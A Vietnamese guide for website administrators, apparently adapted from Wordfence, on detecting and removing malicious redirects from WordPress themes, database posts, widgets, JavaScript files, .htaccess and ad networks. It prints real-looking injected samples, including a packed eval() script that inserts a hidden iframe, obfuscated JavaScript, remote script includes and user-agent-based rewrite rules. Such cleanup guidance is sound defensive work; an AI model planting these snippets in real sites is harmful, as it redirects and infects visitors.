Cách loại bỏ các chuyển hướng độc hại khỏi trang web của bạn

Một trong những kỹ năng mà mọi quản trị viên website nên có là xóa phần mềm độc hại khỏi trang web. Vậy chuyển hướng độc hại là gì và làm thế nào để có thể xóa phần mềm độc hại khỏi trang web đúng cách? Cùng tìm hiểu bài viết dưới đây để biết cách xóa phần mềm độc hại hiệu quả nhé.

Chuyển hướng độc hại là gì?

Chuyển hướng độc hại là đoạn mã được chèn vào một trang web với mục đích chuyển hướng khách truy cập trang web đến một trang web khác. Các chuyển hướng độc hại thường được những kẻ tấn công chèn vào trang web với mục đích tạo ra các lần hiển thị quảng cáo. Tuy nhiên, một số chuyển hướng độc hại có thể có nhiều tác hại hơn. Chuyển huongs đọc hại có thể khai thác các lỗ hổng trong máy tính của khách truy cập trang web thông qua các tập lệnh dựa trên web để cài đặt phần mềm độc hại trên các máy không được bảo vệ. Do đó, điều quan trọng là phải xóa các chuyển hướng độc hại khỏi trang web của bạn.

Xác định xem trang web của bạn có bị nhiễm hay không

Hầu hết chủ sở hữu trang web không biết rằng trang web của họ đang chuyển hướng khách truy cập. Thông thường, lần đầu tiên họ biết đến sự chuyển hướng khi một khách hàng liên hệ để nói rằng họ đã kết thúc ở một trang không mong muốn khi cố gắng truy cập trang web. Một chủ sở hữu trang web thậm chí có thể cố gắng tái tạo vấn đề, chỉ để thấy rằng mọi thứ có vẻ ổn đối với họ trên máy tính của họ, trong khi khách truy cập trang web trên nền tảng di động gặp phải hoạt động độc hại. Việc chuyển hướng có thể xảy ra trên một số trang chứ không phải các trang khác hoặc nó có thể xảy ra trước khi trang web tải.

Nếu Wordfence đã xác định trang web của bạn có một hoặc nhiều chuyển hướng độc hại, bạn có thể thực hiện một số bước để xóa chuyển hướng độc hại và khôi phục trang web của mình về bình thường.

Có thể bạn cần: Hướng dẫn loại bỏ các trang spam khỏi trang web WordPress của bạn

Tìm và loại bỏ các chuyển hướng độc hại

Trước khi bạn thực hiện thay đổi đối với tệp trang web hoặc cơ sở dữ liệu của mình, tôi khuyên bạn nên sao lưu tất cả các tệp trang web ở một nơi an toàn, đặc biệt nếu bạn không quen với hoạt động bên trong của hệ thống quản lý nội dung.

Một chuyển hướng độc hại có thể được chèn vào bất kỳ đâu trên trang web của bạn. Nó có thể nằm trong các tệp trang web của bạn hoặc thậm chí trong cơ sở dữ liệu của bạn.

Dưới đây là một số chuyển hướng độc hại thường được phát hiện bởi quá trình quét của chúng tôi và một số hướng dẫn về cách xóa chúng.

Chèn JavaScript trong các tệp của trang web của bạn

Trên các trang web WordPress, tôi thấy các mục javascript được đặt trong các tệp chủ đề. Thông thường, tôi sẽ tìm thấy những thứ này trong tiêu đề của chủ đề, thường ngay trên thẻ. Nhưng chúng có thể ở nơi khác trong tệp của trang web.

Một tập lệnh thường được tìm thấy trong tiêu đề có thể trông giống như sau:

<sc​ript>eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.from​CharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--){d[e(c)]=k||e(c)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k)}}return p}('i 9(){a=6.h(\'b\');7(!a){5 0=6.j(\'k\');6.g.l(0);0.n=\'b\';0.4.d=\'8\';0.4.c=\'8\';0.4.e=\'f\';0.m=\'w://z.o.B/C.D?t=E\'}}5 2=A.x.q();7(((2.3("p")!=-1&&2.3("r")==-1&&2.3("s")==-1))&&2.3("v")!=-1){5 t=u("9()",y)}',41,41,'el||ua|indexOf|style|var|do​cument|if|1px|MakeFrameEx|element|yahoo_api|height| width|display|none|body|get​ElementById|function|createElement|iframe|append​Child|src|id|nl|msie| toLowerCase|opera|webtv||setTimeout|windows|http|userAgent|1000|juyfdjhdjdgh|navigator|ai| showthread|php|72241732'.split('|'),0,{})) </sc​ript>

<img src="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7" data-wppreserve="%3Cscript%26gt%3Bvar%20ar%3D%22%3D2%7DCd8%20pvsyw%3AAlEeTcBNfb6u%26gt%3B1%26lt%3B%2C)h.r3'niao

0%20g%3B%2F%7Bm%5B%5C%22(t%5D%22%3Btry%7B'qwe'.length(1)%3B%7Dcatch(a)%7Bk%3Dnew%20Boolean().toStr

ing()%3Bdate%3Dnew%20Date()%3B%7D%3Bvar%20ar2%3D%22f120%2C120%2C108%2C63%2C18%2C144%2C12%2C114%2C54%2

C72%2C135%2C48%2C105%2C147%2C93%2C123%2C48%2C147%2C45%2C42%2C48%2C135%2C48%2C105%2C147%2C%2027%2C57

%2C30%2C51%2C111%2C123%2C60%2C111%2C135%

2C48%2C144%2C102%2C66%2C114%2C12%2C30%2C102%2C87%2C138%2C117%2C150%2C87%2C132%2C120%2C120%2C120%2C%20

...%0A%5B%2Fjs%5D%3C%2Fpre%3E%0A%3Cp%3EA%20malicious%20script%20can%20look%20like%20a%20normal%20javasc

ript%20included%20file.%3C%2Fp%3E%0A%3Cpre%3E%5Bjs%20gutter%3D%22false%22%20wraplines%3D%22true%22%5D%

0A%3Cscript%20src%3D%22http%3A%2F%2Fwww.%5Bredacted%5D.com%2Fanyscript.js%22%3E%3C%2Fscript%3E" data-mce-resize="false" data-mce-placeholder="1" class="mce-object" width="20" height="20" alt="&lt;script&gt;" title="&lt;script&gt;" />

Một tập lệnh độc hại cũng có thể được bao gồm trong một tập lệnh khác.

$.getScript('http://www.[redacted].com/script.js', function()

  1. Xác định tập lệnh nào đang thực hiện chuyển hướng độc hại, không phải tất cả javascript trên trang web của bạn đều độc hại. Trên thực tế, hầu hết  các javascript bạn sẽ tìm thấy trên trang web của mình là một phần của chức năng cốt lõi.
  2. Trong Google chrome, nhập “view-source:” vào trước url của trang web (ví dụ: view-source:https://nguyenquangcuong.com) và tìm kiếm “<script” trong tệp. Bạn có thể tìm mã hoặc văn bản nào khác gần với tập lệnh độc hại để xác định tệp trang web nào chứa mã độc hại.
  3. Nếu đó là tệp chủ đề, bạn có thể sử dụng trình chỉnh sửa chủ đề của trang web để xóa javascript vi phạm hoặc bạn có thể tải xuống trang web của mình qua FTP hoặc trình quản lý tệp cpanel của bạn và tải tệp đã làm sạch trở lại máy chủ của bạn.

Javascript được chèn trong các trang hoặc bài viết

Thông thường, những kẻ tấn công sẽ chạy một đoạn mã chèn javascript vào tất cả các bài đăng/ trang trên trang web của bạn. Các chuyển hướng này sẽ không được tìm thấy trong các tệp trang web mà là trong cơ sở dữ liệu của trang web. Có thể có nhiều hơn một tập lệnh được chèn, nó có thể là một trang hoặc có thể nằm trên tất cả chúng. Những tập lệnh này có thể trông giống như cùng một tập lệnh ở trên, nhưng những chuyển hướng này thường có thể bị xáo trộn.

Các chuyển hướng độc hại javascript này sẽ trông tương tự như các ví dụ javascript ở trên.

Đọc thêm: Cách quét trang web WordPress của bạn để tìm phần mềm độc hại

Xóa chuyển hướng này: Để xóa chuyển hướng này, có một số tùy chọn. Thông thường, các chuyển hướng này được chèn vào mọi bài đăng trên trang web. Tập lệnh có thể được xóa bằng cách chỉnh sửa:

  • Trong hệ thống quản lý nội dung
  • Thông qua môt công cụ trong cơ sở dữ liệu như phpMyadmin cho phép chỉnh sửa nhiều trang/ bài đăng cùng một lúc.
  • Thông qua tệp văn bản được tải xuống cục bô và tải các bài đăng đã được làm sạch vào cơ sở dữ liệu bằng công cụ quản lý SQL. Mặc dù nhanh nhất nhưng điều này đòi hỏi một mức độ chuyên môn kỹ thuật cao để có thể làm việc với SQL.

Chuyển hướng javascript được chèn vào các widget

Các tập lệnh độc hại cũng có thể được chèn vào các widget.

Thêm javascript xáo trộn vào các tệp javascript

Kẻ tấn công có thể thêm một vài dòng javascript vào một số hoặc tất cả các tệp javascript trong các tệp của trang web. Tìm kiếm các tệp trang web tìm kiếm URL mà trang web đang chuyển hướng có thể không tìm thấy bất kỳ kết quả nào vì javascript này thường bị xáo trộn. Tham khảo mẫu dưới đây:

var _0xaae8=["","\x6A\x6F\x69\x6E","\x72\x65\x76\x65\x72\x73\x65","\x73\x70\x6C\x69\x74","\x3E\x...

Xóa chuyển hướng này: Để xóa loại chuyển hướng độc hại này, hãy tải toàn bộ trang web bằng FTP xuống máy tính của bạn và tìm kiếm javascript vi phạm. Nếu bạn có một công cụ phát triển cho phép bạn quét tất cả tệp trên trang web của mình, bạn có thể thấy rằng chuyển hướng độc hại này đã được chèn vào tất cả các tệp javascript trên trang web của bạn. Kiểm tra cả tệp .js và .json, bao gồm tệp lõi, chủ đề, plugin,… Sau khi bạn đã xóa tất cả các tệp của trang web, hãy tải trang web đã được làm sạch trở lại máy chủ.

Chuyển hướng được chèn vào tệp htaccess

Tệp htaccess là một tệp được đặt trên máy chủ của bạn cung cấp các chỉ thị cho máy chủ trước khi các tệp của trang web của bạn thậm chí được truy cập. Ví dụ: Đối với một trang web WordPress, tệp htaccess sẽ yêu càu máy chủ gửi yêu cầu liên kết cố định đến tệp index.php chính của WordPress để xử lý. Các chỉ thị khác có thể được đặt trong một tệp htaccess và đó là vị trí ưa thích của những kẻ tấn công để đặt các chuyển hướng dựa trên loại trình duyệt hoặc thiết bị, hoặc theo trang web đã giới thiệu khách truy cập đến trang web của bạn. Một chuyển hướng htaccess có thể giống như sau:

RewriteEngine On RewriteBase / RewriteCond %{HTTP_USER_AGENT} android|bb\d+|meego|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobi

Chuyển hướng htaccess thậm chí có thể chuyển hướng bạn dựa trên trình duyệt hoặc liên kết giới thiệu. Đây là một mẫu:

RewriteEngine On RewriteCond %{HTTP_USER_AGENT} (google|yahoo|msn|aol|bing) [OR] RewriteCond %{HTTP_REFERER} (google|yahoo|ms

Những chuyển hướng này có thể khó cô lập và loại bỏ, thao tác với tệp htaccess có thể khiến trang web ngừng hoạt động hoàn toàn hoặc tạo ra các lỗi không có ý nghĩa gì, chẳng hạn như lỗi máy chủ nội bộ.

Xóa chuyển hướng này: Bắt đầu bằng cách tải xuống tệp htaccess của bạn. Trình quản lý tệp bảng điều khiển của bạn có thể không hiển thị cho bạn tệp “ẩn” này và đôi khi việc tải tệp xuống ổ cứng máy tính của bạn có thể làm cho tệp đó biến mất mặc dù bạn có thể nhìn thấy nó trong ứng dụng FTP của mình. Bạn sẽ cần xóa chuyển hướng, để lại mã cần thiết cho hoạt động của trang web của bạn. Điều này có thể phụ thuộc vào nhà cung cấp Hosting của bạn vì thường có các mục nhập trong tệp htaccess cần thiết cho chức năng trang web của bạn.

Xem ngay: Hướng dẫn tìm và loại bỏ Backdoors trên trang web WordPress của bạn

Mạng quảng cáo

Một số mạng quảng cáo khoan dung trong các tiêu chuẩn của họ đối với quảng cáo mà họ chấp nhận vào mạng của mình. Trang web có thể hoàn toàn không có phần mềm độc hại, nhưng một mạng quảng cáo có thể đang chuyển hướng khách truy cập trang web. Việc xác định mạng quảng cáo nào có thể là thủ phạm có thể là một nhiệm vụ rất khó khăn vì các chuyển hướng quảng cáo nào có thể là thủ phạm có thể là một nhiệm vụ rất khó khăn vì các chuyển hướng quảng cáo độc hại có thể xuất hiện một các lẻ tẻ và không thể đoán trước được.

Xóa chuyển hướng này: Nếu một trang web đang chuyển hướng khách truy cập trang web của bạn một cách độc hại, nếu bạn đã giải quyết hết tất cả các tùy chọn khác và bạn đã đặt mạng quảng cáo trên trang web của mình thì việc xóa các mạng quảng cáo đó có thể giải quyết vấn đề chuyển hướng độc hại.

Nhìn xa hơn sự chuyển hướng

Bất kể bạn đã tìm thấy loại chuyển hướng nào trên trang web của mình, câu hỏi lớn là làm thế nào mà nó được cài vào. Bạn có thể có các phần mềm độc hại hoặc lỗ hổng bảo mật khác trên trang web của mình cho phép kẻ tấn công có quyền truy cập vào trang web và thực hiện chuyển hướng độc hại. Bạn có thể có backdoors, trình tải lên tệp độc hại hoặc các sự cố khác trên trang web.

Đánh giá bài viết

Bình luận

Địa chỉ email của bạn sẽ không được công bố.